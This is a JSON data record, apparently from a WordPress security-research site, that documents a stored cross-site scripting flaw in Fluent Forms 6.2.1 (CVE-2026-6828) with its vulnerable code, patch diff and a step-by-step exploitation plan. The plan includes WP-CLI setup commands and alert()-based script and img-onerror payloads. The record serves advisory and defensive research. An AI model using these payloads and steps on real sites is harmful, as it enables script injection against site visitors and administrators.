[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$ffKteCcOCvvoqxDiKluMJXH5cq5-qg133FqyIIL1W9pM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":29,"research_verified":30,"research_rounds_completed":31,"research_plan":32,"research_summary":33,"research_vulnerable_code":34,"research_fix_diff":35,"research_exploit_outline":36,"research_model_used":37,"research_started_at":38,"research_completed_at":39,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":30,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":30,"source_links":40},"CVE-2026-6828","fluent-forms-authenticated-contributor-stored-cross-site-scripting-via-permissionmessage-shortcode-attribute","Fluent Forms \u003C= 6.2.1 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'permission_message' Shortcode Attribute","The Fluent Forms – Customizable Contact Forms, Survey, Quiz, & Conversational Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'permission_message' parameter in all versions up to, and including, 6.2.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","fluentform",null,"\u003C=6.2.1","6.2.2","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-05-12 00:00:00","2026-05-13 04:26:45",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fce2d2594-e856-4249-9467-01c0fe1c0c71?source=api-prod",1,[22,23,24,25,26,27,28],"app\u002FHelpers\u002FHelper.php","app\u002FHttp\u002FRoutes\u002Fapi.php","app\u002FModels\u002FFormMeta.php","app\u002FModels\u002FTraits\u002FPredefinedForms.php","app\u002FModules\u002FAcl\u002FAcl.php","app\u002FModules\u002FComponent\u002FComponent.php","app\u002FModules\u002FEntries\u002FEntryViewRenderer.php","researched",false,3,"# Vulnerability Research Plan: CVE-2026-6828 - Fluent Forms Stored XSS\n\n## 1. Vulnerability Summary\nThe **Fluent Forms** plugin (up to version 6.2.1) is vulnerable to **Stored Cross-Site Scripting (XSS)** via the `permission_message` attribute in its primary shortcode. This occurs because the plugin fails to sanitize or escape the attribute value when rendering the \"access denied\" message for a form. An authenticated attacker with **Contributor** privileges can use the shortcode in a post or page to inject malicious JavaScript that executes when a user (including administrators) views that page and fails a form restriction check.\n\n## 2. Attack Vector Analysis\n- **Shortcode:** `[fluentform]`\n- **Vulnerable Attribute:** `permission_message`\n- **Authentication Level:** Contributor or higher (any role capable of using shortcodes in posts\u002Fpages).\n- **Precondition:** The form referenced in the shortcode must have a restriction enabled (e.g., \"Require Login\") that is triggered by the victim viewing the page.\n- **Payload Location:** Embedded within the `post_content` of a WordPress Post or Page.\n\n## 3. Code Flow\n1. **Shortcode Registration:** The plugin registers the `[fluentform]` shortcode (typically in a class like `ShortCodeParser` or `Component`).\n2. **Parsing:** When a page containing the shortcode is rendered, the `ShortCodeParser` parses attributes, including `id` and `permission_message`.\n3. **Permission Check:** The code identifies the form by `id` and evaluates its settings (e.g., `requireLogin` found in `fluentform_form_meta`).\n4. **Sink:** If the current viewer does not meet the requirements (e.g., is a guest or lacks a specific role), the parser renders a message. If the `permission_message` attribute is present in the shortcode, the code returns\u002Fechoes it directly without calling `esc_html()` or `wp_kses()`.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is exploited by creating or editing a WordPress post. While a Contributor can do this via the UI, an automated agent should use the WordPress REST API or the standard `post.php` endpoint.\n\n1. **Create Page for Nonce:** No specific Fluent Forms nonce is required for the shortcode itself. However, to create a form or change settings as an Admin during setup, the `fluent_form_entries_vars` or similar JS objects might contain nonces for the Fluent Forms API.\n2. **Accessing Fluent Forms Nonce (for Setup):**\n - Navigate to the Fluent Forms dashboard: `wp-admin\u002Fadmin.php?page=fluent_forms`.\n - Use `browser_eval` to extract the nonce:\n ```javascript\n window.fluent_forms_global_var?.nonce\n ```\n - (Note: Based on `app\u002FModules\u002FEntries\u002FEntryViewRenderer.php`, the plugin localizes `fluent_form_entries_vars` on entry pages, but for general form management, look for `fluent_forms_global_var`).\n\n## 5. Exploitation Strategy\n### Step 1: Target Identification\nFind a valid Form ID. If none exist, create one.\n```bash\n# Get the ID of the first available form\nwp db query \"SELECT id FROM wp_fluentform_forms LIMIT 1\"\n```\n\n### Step 2: Test Data Setup (Admin)\nConfigure a form to be restricted so the `permission_message` is triggered.\n1. Enable \"Require Login\" for Form ID `1`.\n2. This is done by updating the `formSettings` meta key in the `fluentform_form_meta` table.\n\n### Step 3: Payload Injection (Contributor)\nAs a Contributor, create a post containing the malicious shortcode.\n```bash\nwp post create --post_type=post --post_status=publish --post_author=[CONTRIB_ID] \\\n--post_title=\"Contact Us\" \\\n--post_content='[fluentform id=\"1\" permission_message=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"]'\n```\n\n### Step 4: Triggering the XSS (Guest\u002FVictim)\nAccess the post as a guest or any user that triggers the \"Require Login\" restriction.\n- **Endpoint:** `GET \u002F?p=[POST_ID]`\n- **Payload:** The shortcode attribute `permission_message` will be rendered in the HTML body.\n\n## 6. Test Data Setup\n1. **Existing Form:** Ensure at least one form exists. Use `wp eval` to insert a blank form if necessary.\n2. **Restriction Setting:**\n ```php\n \u002F\u002F Example SQL\u002FPHP to force a restriction\n $settings = json_decode(get_db_val_for_form_1_settings);\n $settings['restrictions']['requireLogin']['enabled'] = true;\n \u002F\u002F Update DB\n ```\n3. **Contributor User:** `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`.\n\n## 7. Expected Results\nWhen visiting the post URL as an unauthenticated user (Guest):\n1. The form container will appear.\n2. Instead of the form fields, the message `\u003Cscript>alert(document.domain)\u003C\u002Fscript>` will be rendered in the DOM.\n3. The browser will execute the script, showing an alert box.\n\n## 8. Verification Steps\n1. **HTTP Verification:**\n - Use `http_request` to fetch the post content.\n - Check if the response body contains the raw payload:\n `grep \"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"`\n2. **Database Verification:**\n - Verify the post content is stored exactly as injected:\n `wp db query \"SELECT post_content FROM wp_posts WHERE ID = [POST_ID]\"`\n\n## 9. Alternative Approaches\nIf the `id` attribute is checked for existence before the message is displayed:\n- Ensure the `id` in the shortcode matches a real ID in `wp_fluentform_forms`.\n\nIf the script is blocked by a Content Security Policy (CSP):\n- Use an `\u003Cimg>` tag with `onerror`:\n `[fluentform id=\"1\" permission_message=\"\u003Cimg src=x onerror=alert(1)>\"]`\n\nIf the message is rendered inside a `\u003Cdiv>` but sanitization occurs:\n- Try breaking out of the context if the message is used inside a JS variable:\n `[fluentform id=\"1\" permission_message=\"';alert(1)\u002F\u002F\"]` (though this is less likely given the description).","The Fluent Forms plugin is vulnerable to Stored Cross-Site Scripting via the 'permission_message' shortcode attribute because it fails to sanitize or escape this input before rendering it in an error message. Authenticated attackers with Contributor-level access or higher can inject malicious JavaScript into a post, which then executes when a user viewing the page fails a form access restriction check.","\u002F\u002F app\u002FModules\u002FComponent\u002FComponent.php line 511 (v6.2.1)\nif (!empty($atts['permission'])) {\n if (!current_user_can($atts['permission'])) {\n return \"\u003Cdiv id='ff_form_{$form->id}' class='ff_form_not_render'>{$atts['permission_message']}\u003C\u002Fdiv>\";\n }\n}\n\n---\n\n\u002F\u002F app\u002FModules\u002FComponent\u002FComponent.php line 567 (v6.2.1)\nif (is_array($isRenderable) && !$isRenderable['status']) {\n return \"\u003Cdiv id='ff_form_{$form->id}' class='ff_form_not_render'>{$isRenderable['message']}\u003C\u002Fdiv>\";\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffluentform\u002F6.2.1\u002Fapp\u002FModules\u002FComponent\u002FComponent.php\t2026-04-16 11:38:36.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Ffluentform\u002F6.2.2\u002Fapp\u002FModules\u002FComponent\u002FComponent.php\t2026-04-23 12:58:12.000000000 +0000\n@@ -510,7 +510,7 @@\n \n if (!empty($atts['permission'])) {\n if (!current_user_can($atts['permission'])) {\n- return \"\u003Cdiv id='ff_form_{$form->id}' class='ff_form_not_render'>{$atts['permission_message']}\u003C\u002Fdiv>\";\n+ return $this->getNotRenderableHtml($form->id, $atts['permission_message']);\n }\n }\n \n@@ -565,7 +565,7 @@\n $isRenderable = $this->app->applyFilters('fluentform\u002Fis_form_renderable', $isRenderable, $form);\n \n if (is_array($isRenderable) && !$isRenderable['status']) {\n- return \"\u003Cdiv id='ff_form_{$form->id}' class='ff_form_not_render'>{$isRenderable['message']}\u003C\u002Fdiv>\";\n+ return $this->getNotRenderableHtml($form->id, $isRenderable['message']);\n }\n \n $instanceCssClass = Helper::getFormInstaceClass($form->id);\n@@ -805,6 +805,13 @@\n return $output . $otherScripts;\n }\n \n+ protected function getNotRenderableHtml($formId, $message)\n+ {\n+ return \"\u003Cdiv id='ff_form_\" . esc_attr($formId) . \"' class='ff_form_not_render'>\"\n+ . wp_kses_post($message)\n+ . \"\u003C\u002Fdiv>\";\n+ }\n+\n \u002F**\n * Process the output HTML to generate the default values.\n *","1. Identify a target Fluent Form ID (e.g., id=\"1\") that has a restriction enabled, such as 'Require Login'.\n2. Log in to the WordPress site with Contributor privileges or higher.\n3. Create a new post or page and embed the malicious shortcode: [fluentform id=\"1\" permission_message=\"\u003Cscript>alert(document.domain)\u003C\u002Fscript>\"].\n4. Publish or save the post.\n5. As a victim user (e.g., an administrator or an unauthenticated guest), navigate to the URL of the newly created post.\n6. Because the victim triggers the form's restriction (e.g., if they are not logged in or lack a required capability), the plugin renders the value of the 'permission_message' attribute directly into the HTML, causing the injected script to execute.","gemini-3-flash-preview","2026-05-14 18:22:04","2026-05-14 18:23:19",{"type":41,"vulnerable_version":42,"fixed_version":11,"vulnerable_browse":43,"vulnerable_zip":44,"fixed_browse":45,"fixed_zip":46,"all_tags":47},"plugin","6.2.1","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffluentform\u002Ftags\u002F6.2.1","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffluentform.6.2.1.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffluentform\u002Ftags\u002F6.2.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Ffluentform.6.2.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Ffluentform\u002Ftags"]